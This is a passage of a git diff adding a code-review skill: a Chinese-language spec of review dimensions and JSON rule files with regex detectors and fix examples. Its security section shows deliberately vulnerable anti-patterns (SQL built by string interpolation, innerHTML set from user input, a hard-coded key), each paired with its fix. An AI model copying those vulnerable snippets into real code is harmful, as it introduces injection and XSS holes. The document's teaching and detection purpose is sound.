scores.consistency = findings.length > 0
|
||||
? (validIds / findings.length) * 100
|
||||
: 100;
|
||||
|
||||
// Overall
|
||||
const overall = (
|
||||
scores.completeness * 0.25 +
|
||||
scores.accuracy * 0.25 +
|
||||
scores.actionability * 0.25 +
|
||||
scores.consistency * 0.25
|
||||
);
|
||||
|
||||
return {
|
||||
scores,
|
||||
overall,
|
||||
gate: overall >= 90 ? 'excellent' :
|
||||
overall >= 80 ? 'good' :
|
||||
overall >= 70 ? 'acceptable' : 'needs_improvement'
|
||||
};
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Improvement Recommendations
|
||||
|
||||
### If Completeness is Low
|
||||
|
||||
- 增加扫描的文件范围
|
||||
- 确保所有维度都被审查
|
||||
- 重点关注高风险区域
|
||||
|
||||
### If Accuracy is Low
|
||||
|
||||
- 提高规则精度
|
||||
- 减少误报
|
||||
- 验证行号准确性
|
||||
|
||||
### If Actionability is Low
|
||||
|
||||
- 为每个问题添加修复建议
|
||||
- 提供代码示例
|
||||
- 说明修复步骤
|
||||
|
||||
### If Consistency is Low
|
||||
|
||||
- 统一 ID 格式
|
||||
- 标准化严重程度判定
|
||||
- 使用模板化描述
|
||||
337
.claude/skills/review-code/specs/review-dimensions.md
Normal file
337
.claude/skills/review-code/specs/review-dimensions.md
Normal file
@@ -0,0 +1,337 @@
|
||||
# Review Dimensions
|
||||
|
||||
代码审查维度定义和检查点规范。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | 获取维度检查规则 | All |
|
||||
| action-generate-report | 维度名称映射 | Dimension Names |
|
||||
|
||||
---
|
||||
|
||||
## Dimension Overview
|
||||
|
||||
| Dimension | Weight | Focus | Key Indicators |
|
||||
|-----------|--------|-------|----------------|
|
||||
| **Correctness** | 25% | 功能正确性 | 边界条件、错误处理、类型安全 |
|
||||
| **Security** | 25% | 安全风险 | 注入攻击、敏感数据、权限 |
|
||||
| **Performance** | 15% | 执行效率 | 算法复杂度、资源使用 |
|
||||
| **Readability** | 15% | 可维护性 | 命名、结构、注释 |
|
||||
| **Testing** | 10% | 测试质量 | 覆盖率、边界测试 |
|
||||
| **Architecture** | 10% | 架构一致性 | 分层、依赖、模式 |
|
||||
|
||||
---
|
||||
|
||||
## 1. Correctness (正确性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **边界条件处理**
|
||||
- 空数组/空字符串
|
||||
- Null/Undefined
|
||||
- 数值边界 (0, 负数, MAX_INT)
|
||||
- 集合边界 (首元素, 末元素)
|
||||
|
||||
- [ ] **错误处理**
|
||||
- Try-catch 覆盖
|
||||
- 错误不被静默吞掉
|
||||
- 错误信息有意义
|
||||
- 资源正确释放
|
||||
|
||||
- [ ] **类型安全**
|
||||
- 类型转换正确
|
||||
- 避免隐式转换
|
||||
- TypeScript strict mode
|
||||
|
||||
- [ ] **逻辑完整性**
|
||||
- If-else 分支完整
|
||||
- Switch 有 default
|
||||
- 循环终止条件正确
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 未检查 null
|
||||
function getName(user) {
|
||||
return user.name.toUpperCase(); // user 可能为 null
|
||||
}
|
||||
|
||||
// ✅ 修复
|
||||
function getName(user) {
|
||||
return user?.name?.toUpperCase() ?? 'Unknown';
|
||||
}
|
||||
|
||||
// ❌ 问题: 空 catch 块
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {} // 错误被静默吞掉
|
||||
|
||||
// ✅ 修复
|
||||
try {
|
||||
await fetchData();
|
||||
} catch (e) {
|
||||
console.error('Failed to fetch data:', e);
|
||||
throw e;
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 2. Security (安全性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **注入防护**
|
||||
- SQL 注入 (使用参数化查询)
|
||||
- XSS (避免 innerHTML)
|
||||
- 命令注入 (避免 exec)
|
||||
- 路径遍历
|
||||
|
||||
- [ ] **认证授权**
|
||||
- 权限检查完整
|
||||
- Token 验证
|
||||
- Session 管理
|
||||
|
||||
- [ ] **敏感数据**
|
||||
- 无硬编码密钥
|
||||
- 日志不含敏感信息
|
||||
- 传输加密
|
||||
|
||||
- [ ] **依赖安全**
|
||||
- 无已知漏洞依赖
|
||||
- 版本锁定
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: SQL 注入风险
|
||||
const query = `SELECT * FROM users WHERE id = ${userId}`;
|
||||
|
||||
// ✅ 修复: 参数化查询
|
||||
const query = `SELECT * FROM users WHERE id = ?`;
|
||||
db.query(query, [userId]);
|
||||
|
||||
// ❌ 问题: XSS 风险
|
||||
element.innerHTML = userInput;
|
||||
|
||||
// ✅ 修复
|
||||
element.textContent = userInput;
|
||||
|
||||
// ❌ 问题: 硬编码密钥
|
||||
const apiKey = 'sk-xxxxxxxxxxxx';
|
||||
|
||||
// ✅ 修复
|
||||
const apiKey = process.env.API_KEY;
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Performance (性能)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **算法复杂度**
|
||||
- 避免 O(n²) 在大数据集
|
||||
- 使用合适的数据结构
|
||||
- 避免不必要的循环
|
||||
|
||||
- [ ] **I/O 效率**
|
||||
- 批量操作 vs 循环单条
|
||||
- 避免 N+1 查询
|
||||
- 适当使用缓存
|
||||
|
||||
- [ ] **资源使用**
|
||||
- 内存泄漏
|
||||
- 连接池使用
|
||||
- 大文件流式处理
|
||||
|
||||
- [ ] **异步处理**
|
||||
- 并行 vs 串行
|
||||
- Promise.all 使用
|
||||
- 避免阻塞
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: N+1 查询
|
||||
for (const user of users) {
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id = ?', [user.id]);
|
||||
}
|
||||
|
||||
// ✅ 修复: 批量查询
|
||||
const userIds = users.map(u => u.id);
|
||||
const posts = await db.query('SELECT * FROM posts WHERE user_id IN (?)', [userIds]);
|
||||
|
||||
// ❌ 问题: 串行执行可并行操作
|
||||
const a = await fetchA();
|
||||
const b = await fetchB();
|
||||
const c = await fetchC();
|
||||
|
||||
// ✅ 修复: 并行执行
|
||||
const [a, b, c] = await Promise.all([fetchA(), fetchB(), fetchC()]);
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Readability (可读性)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **命名规范**
|
||||
- 变量名见名知意
|
||||
- 函数名表达动作
|
||||
- 常量使用 UPPER_CASE
|
||||
- 避免缩写和单字母
|
||||
|
||||
- [ ] **函数设计**
|
||||
- 单一职责
|
||||
- 长度 < 50 行
|
||||
- 参数 < 5 个
|
||||
- 嵌套 < 4 层
|
||||
|
||||
- [ ] **代码组织**
|
||||
- 逻辑分组
|
||||
- 空行分隔
|
||||
- Import 顺序
|
||||
|
||||
- [ ] **注释质量**
|
||||
- 解释 WHY 而非 WHAT
|
||||
- 及时更新
|
||||
- 无冗余注释
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 命名不清晰
|
||||
const d = new Date();
|
||||
const a = users.filter(x => x.s === 'active');
|
||||
|
||||
// ✅ 修复
|
||||
const currentDate = new Date();
|
||||
const activeUsers = users.filter(user => user.status === 'active');
|
||||
|
||||
// ❌ 问题: 函数过长、职责过多
|
||||
function processOrder(order) {
|
||||
// ... 200 行代码,包含验证、计算、保存、通知
|
||||
}
|
||||
|
||||
// ✅ 修复: 拆分职责
|
||||
function validateOrder(order) { /* ... */ }
|
||||
function calculateTotal(order) { /* ... */ }
|
||||
function saveOrder(order) { /* ... */ }
|
||||
function notifyCustomer(order) { /* ... */ }
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Testing (测试)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **测试覆盖**
|
||||
- 核心逻辑有测试
|
||||
- 边界条件有测试
|
||||
- 错误路径有测试
|
||||
|
||||
- [ ] **测试质量**
|
||||
- 测试独立
|
||||
- 断言明确
|
||||
- Mock 适度
|
||||
|
||||
- [ ] **测试可维护性**
|
||||
- 命名清晰
|
||||
- 结构统一
|
||||
- 避免重复
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 测试不独立
|
||||
let counter = 0;
|
||||
test('increment', () => {
|
||||
counter++; // 依赖外部状态
|
||||
expect(counter).toBe(1);
|
||||
});
|
||||
|
||||
// ✅ 修复: 每个测试独立
|
||||
test('increment', () => {
|
||||
const counter = new Counter();
|
||||
counter.increment();
|
||||
expect(counter.value).toBe(1);
|
||||
});
|
||||
|
||||
// ❌ 问题: 缺少边界测试
|
||||
test('divide', () => {
|
||||
expect(divide(10, 2)).toBe(5);
|
||||
});
|
||||
|
||||
// ✅ 修复: 包含边界情况
|
||||
test('divide by zero throws', () => {
|
||||
expect(() => divide(10, 0)).toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Architecture (架构)
|
||||
|
||||
### 检查清单
|
||||
|
||||
- [ ] **分层结构**
|
||||
- 层次清晰
|
||||
- 依赖方向正确
|
||||
- 无循环依赖
|
||||
|
||||
- [ ] **模块化**
|
||||
- 高内聚低耦合
|
||||
- 接口定义清晰
|
||||
- 职责单一
|
||||
|
||||
- [ ] **设计模式**
|
||||
- 使用合适的模式
|
||||
- 避免过度设计
|
||||
- 遵循项目既有模式
|
||||
|
||||
### 常见问题模式
|
||||
|
||||
```javascript
|
||||
// ❌ 问题: 层次混乱 (Controller 直接操作数据库)
|
||||
class UserController {
|
||||
async getUser(req, res) {
|
||||
const user = await db.query('SELECT * FROM users WHERE id = ?', [req.params.id]);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ✅ 修复: 分层清晰
|
||||
class UserController {
|
||||
constructor(private userService: UserService) {}
|
||||
|
||||
async getUser(req, res) {
|
||||
const user = await this.userService.findById(req.params.id);
|
||||
res.json(user);
|
||||
}
|
||||
}
|
||||
|
||||
// ❌ 问题: 循环依赖
|
||||
// moduleA.ts
|
||||
import { funcB } from './moduleB';
|
||||
// moduleB.ts
|
||||
import { funcA } from './moduleA';
|
||||
|
||||
// ✅ 修复: 提取共享模块或使用依赖注入
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Severity Mapping
|
||||
|
||||
| Severity | Criteria |
|
||||
|----------|----------|
|
||||
| **Critical** | 安全漏洞、数据损坏风险、崩溃风险 |
|
||||
| **High** | 功能缺陷、性能严重问题、重要边界未处理 |
|
||||
| **Medium** | 代码质量问题、可维护性问题 |
|
||||
| **Low** | 风格问题、优化建议 |
|
||||
| **Info** | 信息性建议、学习机会 |
|
||||
@@ -0,0 +1,63 @@
|
||||
{
|
||||
"dimension": "architecture",
|
||||
"prefix": "ARCH",
|
||||
"description": "Rules for detecting architecture issues including coupling, layering, and design patterns",
|
||||
"rules": [
|
||||
{
|
||||
"id": "circular-dependency",
|
||||
"category": "dependency",
|
||||
"severity": "high",
|
||||
"pattern": "import\\s+.*from\\s+['\"]\\.\\..*['\"]",
|
||||
"patternType": "regex",
|
||||
"contextPattern": "export.*import.*from.*same-module",
|
||||
"description": "Potential circular dependency detected. Circular imports cause initialization issues and tight coupling",
|
||||
"recommendation": "Extract shared code to a separate module, use dependency injection, or restructure the dependency graph",
|
||||
"fixExample": "// Before - A imports B, B imports A\n// moduleA.ts\nimport { funcB } from './moduleB';\nexport const funcA = () => funcB();\n\n// moduleB.ts\nimport { funcA } from './moduleA'; // circular!\n\n// After - extract shared logic\n// shared.ts\nexport const sharedLogic = () => { ... };\n\n// moduleA.ts\nimport { sharedLogic } from './shared';"
|
||||
},
|
||||
{
|
||||
"id": "god-class",
|
||||
"category": "single-responsibility",
|
||||
"severity": "high",
|
||||
"pattern": "class\\s+\\w+\\s*\\{",
|
||||
"patternType": "regex",
|
||||
"methodThreshold": 15,
|
||||
"lineThreshold": 300,
|
||||
"description": "Class with too many methods or lines violates single responsibility principle",
|
||||
"recommendation": "Split into smaller, focused classes. Each class should have one reason to change",
|
||||
"fixExample": "// Before - UserManager handles everything\nclass UserManager {\n createUser() { ... }\n updateUser() { ... }\n sendEmail() { ... }\n generateReport() { ... }\n validatePassword() { ... }\n}\n\n// After - separated concerns\nclass UserRepository { create, update, delete }\nclass EmailService { sendEmail }\nclass ReportGenerator { generate }\nclass PasswordValidator { validate }"
|
||||
},
|
||||
{
|
||||
"id": "layer-violation",
|
||||
"category": "layering",
|
||||
"severity": "high",
|
||||
"pattern": "import.*(?:repository|database|sql|prisma|mongoose).*from",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["controller", "handler", "route", "component"],
|
||||
"description": "Direct database access from presentation layer violates layered architecture",
|
||||
"recommendation": "Access data through service/use-case layer. Keep controllers thin and delegate to services",
|
||||
"fixExample": "// Before - controller accesses DB directly\nimport { prisma } from './database';\nconst getUsers = async () => prisma.user.findMany();\n\n// After - use service layer\nimport { userService } from './services';\nconst getUsers = async () => userService.getAll();"
|
||||
},
|
||||
{
|
||||
"id": "missing-interface",
|
||||
"category": "abstraction",
|
||||
"severity": "medium",
|
||||
"pattern": "new\\s+\\w+Service\\(|new\\s+\\w+Repository\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["interface", "implements", "inject"],
|
||||
"description": "Direct instantiation of services/repositories creates tight coupling",
|
||||
"recommendation": "Define interfaces and use dependency injection for loose coupling and testability",
|
||||
"fixExample": "// Before - tight coupling\nclass OrderService {\n private repo = new OrderRepository();\n}\n\n// After - loose coupling\ninterface IOrderRepository {\n findById(id: string): Promise<Order>;\n}\n\nclass OrderService {\n constructor(private repo: IOrderRepository) {}\n}"
|
||||
},
|
||||
{
|
||||
"id": "mixed-concerns",
|
||||
"category": "separation-of-concerns",
|
||||
"severity": "medium",
|
||||
"pattern": "fetch\\s*\\(|axios\\.|http\\.",
|
||||
"patternType": "regex",
|
||||
"contextPath": ["component", "view", "page"],
|
||||
"description": "Network calls in UI components mix data fetching with presentation",
|
||||
"recommendation": "Extract data fetching to hooks, services, or state management layer",
|
||||
"fixExample": "// Before - fetch in component\nfunction UserList() {\n const [users, setUsers] = useState([]);\n useEffect(() => {\n fetch('/api/users').then(r => r.json()).then(setUsers);\n }, []);\n}\n\n// After - custom hook\nfunction useUsers() {\n return useQuery('users', () => userService.getAll());\n}\n\nfunction UserList() {\n const { data: users } = useUsers();\n}"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
{
|
||||
"dimension": "correctness",
|
||||
"prefix": "CORR",
|
||||
"description": "Rules for detecting logical errors, null handling, and error handling issues",
|
||||
"rules": [
|
||||
{
|
||||
"id": "null-check",
|
||||
"category": "null-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\w+\\.\\w+(?!\\.?\\?)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\?\\.", "if\\s*\\(", "!==?\\s*null", "!==?\\s*undefined", "&&\\s*\\w+\\."],
|
||||
"description": "Property access without null/undefined check may cause runtime errors",
|
||||
"recommendation": "Add null/undefined check before accessing properties using optional chaining or conditional checks",
|
||||
"fixExample": "// Before\nobj.property.value\n\n// After\nobj?.property?.value\n// or\nif (obj && obj.property) { obj.property.value }"
|
||||
},
|
||||
{
|
||||
"id": "empty-catch",
|
||||
"category": "empty-catch",
|
||||
"severity": "high",
|
||||
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
|
||||
"patternType": "regex",
|
||||
"description": "Empty catch block silently swallows errors, hiding bugs and making debugging difficult",
|
||||
"recommendation": "Log the error, rethrow it, or handle it appropriately. Never silently ignore exceptions",
|
||||
"fixExample": "// Before\ncatch (e) { }\n\n// After\ncatch (e) {\n console.error('Operation failed:', e);\n throw e; // or handle appropriately\n}"
|
||||
},
|
||||
{
|
||||
"id": "unreachable-code",
|
||||
"category": "unreachable-code",
|
||||
"severity": "medium",
|
||||
"pattern": "return\\s+[^;]+;\\s*\\n\\s*[^}\\s]",
|
||||
"patternType": "regex",
|
||||
"description": "Code after return statement is unreachable and will never execute",
|
||||
"recommendation": "Remove unreachable code or restructure the logic to ensure all code paths are accessible",
|
||||
"fixExample": "// Before\nfunction example() {\n return value;\n doSomething(); // unreachable\n}\n\n// After\nfunction example() {\n doSomething();\n return value;\n}"
|
||||
},
|
||||
{
|
||||
"id": "array-index-unchecked",
|
||||
"category": "boundary-check",
|
||||
"severity": "high",
|
||||
"pattern": "\\[\\d+\\]|\\[\\w+\\](?!\\s*[!=<>])",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["\\.length", "Array\\.isArray", "\\?.\\["],
|
||||
"description": "Array index access without boundary check may cause undefined access or out-of-bounds errors",
|
||||
"recommendation": "Check array length or use optional chaining before accessing array elements",
|
||||
"fixExample": "// Before\nconst item = arr[index];\n\n// After\nconst item = arr?.[index];\n// or\nconst item = index < arr.length ? arr[index] : defaultValue;"
|
||||
},
|
||||
{
|
||||
"id": "comparison-type-coercion",
|
||||
"category": "type-safety",
|
||||
"severity": "medium",
|
||||
"pattern": "[^!=]==[^=]|[^!]==[^=]",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["===", "!=="],
|
||||
"description": "Using == instead of === can lead to unexpected type coercion",
|
||||
"recommendation": "Use strict equality (===) to avoid implicit type conversion",
|
||||
"fixExample": "// Before\nif (value == null)\nif (a == b)\n\n// After\nif (value === null || value === undefined)\nif (a === b)"
|
||||
}
|
||||
]
|
||||
}
|
||||
140
.claude/skills/review-code/specs/rules/index.md
Normal file
140
.claude/skills/review-code/specs/rules/index.md
Normal file
@@ -0,0 +1,140 @@
|
||||
# Code Review Rules Index
|
||||
|
||||
This directory contains externalized review rules for the multi-dimensional code review skill.
|
||||
|
||||
## Directory Structure
|
||||
|
||||
```
|
||||
rules/
|
||||
├── index.md # This file
|
||||
├── correctness-rules.json # CORR - Logic and error handling
|
||||
├── security-rules.json # SEC - Security vulnerabilities
|
||||
├── performance-rules.json # PERF - Performance issues
|
||||
├── readability-rules.json # READ - Code clarity
|
||||
├── testing-rules.json # TEST - Test quality
|
||||
└── architecture-rules.json # ARCH - Design patterns
|
||||
```
|
||||
|
||||
## Rule File Schema
|
||||
|
||||
Each rule file follows this JSON schema:
|
||||
|
||||
```json
|
||||
{
|
||||
"dimension": "string", // Dimension identifier
|
||||
"prefix": "string", // Finding ID prefix (4 chars)
|
||||
"description": "string", // Dimension description
|
||||
"rules": [
|
||||
{
|
||||
"id": "string", // Unique rule identifier
|
||||
"category": "string", // Rule category within dimension
|
||||
"severity": "critical|high|medium|low",
|
||||
"pattern": "string", // Detection pattern
|
||||
"patternType": "regex|includes|ast",
|
||||
"negativePatterns": [], // Patterns that exclude matches
|
||||
"caseInsensitive": false, // For regex patterns
|
||||
"contextPattern": "", // Additional context requirement
|
||||
"contextPath": [], // Path patterns for context
|
||||
"lineThreshold": 0, // For size-based rules
|
||||
"methodThreshold": 0, // For complexity rules
|
||||
"description": "string", // Issue description
|
||||
"recommendation": "string", // How to fix
|
||||
"fixExample": "string" // Code example
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Dimension Summary
|
||||
|
||||
| Dimension | Prefix | Rules | Focus Areas |
|
||||
|-----------|--------|-------|-------------|
|
||||
| Correctness | CORR | 5 | Null checks, error handling, type safety |
|
||||
| Security | SEC | 5 | XSS, injection, secrets, crypto |
|
||||
| Performance | PERF | 5 | Complexity, I/O, memory leaks |
|
||||
| Readability | READ | 5 | Naming, length, nesting, magic values |
|
||||
| Testing | TEST | 5 | Assertions, coverage, mock quality |
|
||||
| Architecture | ARCH | 5 | Dependencies, layering, coupling |
|
||||
|
||||
## Severity Levels
|
||||
|
||||
| Severity | Description | Action |
|
||||
|----------|-------------|--------|
|
||||
| **critical** | Security vulnerability or data loss risk | Must fix before release |
|
||||
| **high** | Bug or significant quality issue | Fix in current sprint |
|
||||
| **medium** | Code smell or maintainability concern | Plan to address |
|
||||
| **low** | Style or minor improvement | Address when convenient |
|
||||
|
||||
## Pattern Types
|
||||
|
||||
### regex
|
||||
Standard regular expression pattern. Supports flags via `caseInsensitive`.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "catch\\s*\\([^)]*\\)\\s*\\{\\s*\\}",
|
||||
"patternType": "regex"
|
||||
}
|
||||
```
|
||||
|
||||
### includes
|
||||
Simple substring match. Faster than regex for literal strings.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "innerHTML",
|
||||
"patternType": "includes"
|
||||
}
|
||||
```
|
||||
|
||||
### ast (Future)
|
||||
AST-based detection for complex structural patterns.
|
||||
|
||||
```json
|
||||
{
|
||||
"pattern": "function[params>5]",
|
||||
"patternType": "ast"
|
||||
}
|
||||
```
|
||||
|
||||
## Usage in Code
|
||||
|
||||
```javascript
|
||||
// Load rules
|
||||
const rules = JSON.parse(fs.readFileSync('correctness-rules.json'));
|
||||
|
||||
// Apply rules
|
||||
for (const rule of rules.rules) {
|
||||
const matches = detectByPattern(content, rule.pattern, rule.patternType);
|
||||
for (const match of matches) {
|
||||
// Check negative patterns
|
||||
if (rule.negativePatterns?.some(np => match.context.includes(np))) {
|
||||
continue;
|
||||
}
|
||||
findings.push({
|
||||
id: `${rules.prefix}-${counter++}`,
|
||||
severity: rule.severity,
|
||||
category: rule.category,
|
||||
description: rule.description,
|
||||
recommendation: rule.recommendation,
|
||||
fixExample: rule.fixExample
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Adding New Rules
|
||||
|
||||
1. Identify the appropriate dimension
|
||||
2. Create rule with unique `id` within dimension
|
||||
3. Choose appropriate `patternType`
|
||||
4. Provide clear `description` and `recommendation`
|
||||
5. Include practical `fixExample`
|
||||
6. Test against sample code
|
||||
|
||||
## Rule Maintenance
|
||||
|
||||
- Review rules quarterly for relevance
|
||||
- Update patterns as language/framework evolves
|
||||
- Track false positive rates
|
||||
- Collect feedback from users
|
||||
@@ -0,0 +1,59 @@
|
||||
{
|
||||
"dimension": "performance",
|
||||
"prefix": "PERF",
|
||||
"description": "Rules for detecting performance issues including inefficient algorithms, memory leaks, and resource waste",
|
||||
"rules": [
|
||||
{
|
||||
"id": "nested-loops",
|
||||
"category": "algorithm-complexity",
|
||||
"severity": "medium",
|
||||
"pattern": "for\\s*\\([^)]+\\)\\s*\\{[^}]*for\\s*\\([^)]+\\)|forEach\\s*\\([^)]+\\)\\s*\\{[^}]*forEach",
|
||||
"patternType": "regex",
|
||||
"description": "Nested loops may indicate O(n^2) or worse complexity. Consider if this can be optimized",
|
||||
"recommendation": "Use Map/Set for O(1) lookups, break early when possible, or restructure the algorithm",
|
||||
"fixExample": "// Before - O(n^2)\nfor (const a of listA) {\n for (const b of listB) {\n if (a.id === b.id) { ... }\n }\n}\n\n// After - O(n)\nconst bMap = new Map(listB.map(b => [b.id, b]));\nfor (const a of listA) {\n const b = bMap.get(a.id);\n if (b) { ... }\n}"
|
||||
},
|
||||
{
|
||||
"id": "array-in-loop",
|
||||
"category": "inefficient-operation",
|
||||
"severity": "high",
|
||||
"pattern": "\\.includes\\s*\\(|indexOf\\s*\\(|find\\s*\\(",
|
||||
"patternType": "includes",
|
||||
"contextPattern": "for|while|forEach|map|filter|reduce",
|
||||
"description": "Array search methods inside loops cause O(n*m) complexity. Consider using Set or Map",
|
||||
"recommendation": "Convert array to Set before the loop for O(1) lookups",
|
||||
"fixExample": "// Before - O(n*m)\nfor (const item of items) {\n if (existingIds.includes(item.id)) { ... }\n}\n\n// After - O(n)\nconst idSet = new Set(existingIds);\nfor (const item of items) {\n if (idSet.has(item.id)) { ... }\n}"
|
||||
},
|
||||
{
|
||||
"id": "synchronous-io",
|
||||
"category": "io-efficiency",
|
||||
"severity": "high",
|
||||
"pattern": "readFileSync|writeFileSync|execSync|spawnSync",
|
||||
"patternType": "includes",
|
||||
"description": "Synchronous I/O blocks the event loop and degrades application responsiveness",
|
||||
"recommendation": "Use async versions (readFile, writeFile) or Promise-based APIs",
|
||||
"fixExample": "// Before\nconst data = fs.readFileSync(path);\n\n// After\nconst data = await fs.promises.readFile(path);\n// or\nfs.readFile(path, (err, data) => { ... });"
|
||||
},
|
||||
{
|
||||
"id": "memory-leak-closure",
|
||||
"category": "memory-leak",
|
||||
"severity": "high",
|
||||
"pattern": "addEventListener\\s*\\(|setInterval\\s*\\(|setTimeout\\s*\\(",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["removeEventListener", "clearInterval", "clearTimeout"],
|
||||
"description": "Event listeners and timers without cleanup can cause memory leaks",
|
||||
"recommendation": "Always remove event listeners and clear timers in cleanup functions (componentWillUnmount, useEffect cleanup)",
|
||||
"fixExample": "// Before\nuseEffect(() => {\n window.addEventListener('resize', handler);\n}, []);\n\n// After\nuseEffect(() => {\n window.addEventListener('resize', handler);\n return () => window.removeEventListener('resize', handler);\n}, []);"
|
||||
},
|
||||
{
|
||||
"id": "unnecessary-rerender",
|
||||
"category": "react-performance",
|
||||
"severity": "medium",
|
||||
"pattern": "useState\\s*\\(\\s*\\{|useState\\s*\\(\\s*\\[",
|
||||
"patternType": "regex",
|
||||
"description": "Creating new object/array references in useState can cause unnecessary re-renders",
|
||||
"recommendation": "Use useMemo for computed values, useCallback for functions, or consider state management libraries",
|
||||
"fixExample": "// Before - new object every render\nconst [config] = useState({ theme: 'dark' });\n\n// After - stable reference\nconst defaultConfig = useMemo(() => ({ theme: 'dark' }), []);\nconst [config] = useState(defaultConfig);"
|
||||
}
|
||||
]
|
||||
}
|
||||
@@ -0,0 +1,60 @@
|
||||
{
|
||||
"dimension": "readability",
|
||||
"prefix": "READ",
|
||||
"description": "Rules for detecting code readability issues including naming, complexity, and documentation",
|
||||
"rules": [
|
||||
{
|
||||
"id": "long-function",
|
||||
"category": "function-length",
|
||||
"severity": "medium",
|
||||
"pattern": "function\\s+\\w+\\s*\\([^)]*\\)\\s*\\{|=>\\s*\\{",
|
||||
"patternType": "regex",
|
||||
"lineThreshold": 50,
|
||||
"description": "Functions longer than 50 lines are difficult to understand and maintain",
|
||||
"recommendation": "Break down into smaller, focused functions. Each function should do one thing well",
|
||||
"fixExample": "// Before - 100 line function\nfunction processData(data) {\n // validation\n // transformation\n // calculation\n // formatting\n // output\n}\n\n// After - composed functions\nfunction processData(data) {\n const validated = validateData(data);\n const transformed = transformData(validated);\n return formatOutput(calculateResults(transformed));\n}"
|
||||
},
|
||||
{
|
||||
"id": "single-letter-variable",
|
||||
"category": "naming",
|
||||
"severity": "low",
|
||||
"pattern": "(?:const|let|var)\\s+[a-z]\\s*=",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["for\\s*\\(", "\\[\\w,\\s*\\w\\]", "catch\\s*\\(e\\)"],
|
||||
"description": "Single letter variable names reduce code readability except in specific contexts (loop counters, catch)",
|
||||
"recommendation": "Use descriptive names that convey the variable's purpose",
|
||||
"fixExample": "// Before\nconst d = getData();\nconst r = d.map(x => x.value);\n\n// After\nconst userData = getData();\nconst userValues = userData.map(user => user.value);"
|
||||
},
|
||||
{
|
||||
"id": "deep-nesting",
|
||||
"category": "complexity",
|
||||
"severity": "high",
|
||||
"pattern": "\\{[^}]*\\{[^}]*\\{[^}]*\\{",
|
||||
"patternType": "regex",
|
||||
"description": "Deeply nested code (4+ levels) is hard to follow and maintain",
|
||||
"recommendation": "Use early returns, extract functions, or flatten conditionals",
|
||||
"fixExample": "// Before\nif (user) {\n if (user.permissions) {\n if (user.permissions.canEdit) {\n if (document.isEditable) {\n // do work\n }\n }\n }\n}\n\n// After\nif (!user?.permissions?.canEdit) return;\nif (!document.isEditable) return;\n// do work"
|
||||
},
|
||||
{
|
||||
"id": "magic-number",
|
||||
"category": "magic-value",
|
||||
"severity": "low",
|
||||
"pattern": "[^\\d]\\d{2,}[^\\d]|setTimeout\\s*\\([^,]+,\\s*\\d{4,}\\)",
|
||||
"patternType": "regex",
|
||||
"negativePatterns": ["const", "let", "enum", "0x", "100", "1000"],
|
||||
"description": "Magic numbers without explanation make code hard to understand",
|
||||
"recommendation": "Extract magic numbers into named constants with descriptive names",
|
||||
"fixExample": "// Before\nif (status === 403) { ... }\nsetTimeout(callback, 86400000);\n\n// After\nconst HTTP_FORBIDDEN = 403;\nconst ONE_DAY_MS = 24 * 60 * 60 * 1000;\nif (status === HTTP_FORBIDDEN) { ... }\nsetTimeout(callback, ONE_DAY_MS);"
|
||||
},
|
||||
{
|
||||
"id": "commented-code",
|
||||
"category": "dead-code",
|
||||
"severity": "low",
|
||||
"pattern": "//\\s*(const|let|var|function|if|for|while|return)\\s+",
|
||||
"patternType": "regex",
|
||||
"description": "Commented-out code adds noise and should be removed. Use version control for history",
|
||||
"recommendation": "Remove commented code. If needed for reference, add a comment explaining why with a link to relevant commit/issue",
|
||||
"fixExample": "// Before\n// function oldImplementation() { ... }\n// const legacyConfig = {...};\n\n// After\n// See PR #123 for previous implementation\n// removed 2024-01-01"
|
||||
}
|
||||
]
|
||||
}
|
||||
58
.claude/skills/review-code/specs/rules/security-rules.json
Normal file
58
.claude/skills/review-code/specs/rules/security-rules.json
Normal file
@@ -0,0 +1,58 @@
|
||||
{
|
||||
"dimension": "security",
|
||||
"prefix": "SEC",
|
||||
"description": "Rules for detecting security vulnerabilities including XSS, injection, and credential exposure",
|
||||
"rules": [
|
||||
{
|
||||
"id": "xss-innerHTML",
|
||||
"category": "xss-risk",
|
||||
"severity": "critical",
|
||||
"pattern": "innerHTML\\s*=|dangerouslySetInnerHTML",
|
||||
"patternType": "includes",
|
||||
